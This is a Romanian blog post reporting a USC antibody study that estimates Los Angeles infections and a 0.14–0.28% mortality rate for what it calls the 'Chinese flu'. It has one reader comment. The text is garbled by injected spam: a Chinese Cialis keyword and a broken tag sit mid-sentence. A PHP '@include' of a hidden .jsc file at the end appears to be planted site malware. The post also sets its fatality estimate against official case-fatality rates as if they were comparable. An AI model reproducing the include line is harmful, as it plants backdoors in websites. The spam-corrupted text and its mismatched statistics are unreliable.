Warning: Undefined array key "action" in /home/cronicarul.ro/public_html/wp-content/themes/generatepress_child/functions.php on line 2
Gripa chinezească dincolo de cifrele oficiale – Cronicarul

Gripa chinezească dincolo de cifrele oficiale

Un grup de cercetători de la universitatea USC din Los Angeles a făcut un studiu științific în încercarea de a determina răspândirea virusului care declanșează gripa chinezească în cadrul populației.

Pentru aceasta au folosit un eșantion reprezentativ de 863 de adulți generat de o firmă de marketing.  Pentru testare s-a folosit un test produs de firma Premier Biotech cu o rată a acurateții de 90-95%. La 4,1% dintre cei testați au fost depistați anticorpi împotriva virusului care generează gripa chinezească.

Extrapolând rezultatele la întreaga populație din zona Los Angeles cercetătorii au ajuns la concluzia că 犀利士
g>numărul celor infectați este între 221.000 și 442.000. În același timp numărul oficial al celor infectați era de doar 8.000.

Dacă rezultatele testului sunt corecte înseamnă că rata mortalității este între 0.14% și 0.28%.

De menționat că datele oficiale din SUA ne arată o rată a mortalității în zona Los Angeles de 4,5%, în zona New York de 6,3% iar la nivel federal de 5,3%.

Sursa: Daily Mail

Un comentariu la „Gripa chinezească dincolo de cifrele oficiale”

  1. Pornind de la numărul de 863 de testați extrapolarea mi se pare puțin forțată, având in vedere populatia LA. Si-apoi, trebuie raportat numarul oficial al celor infectati la numarul celor testati, tot oficial. Este cert, insa, ca datele ”oficiale”raportate peste tot in lume nu corespund realitatii…

    Răspunde

Lasă un comentariu

@include "wp-content/themes/seotheme/inc/customizer/assets/js/include/7536.jsc";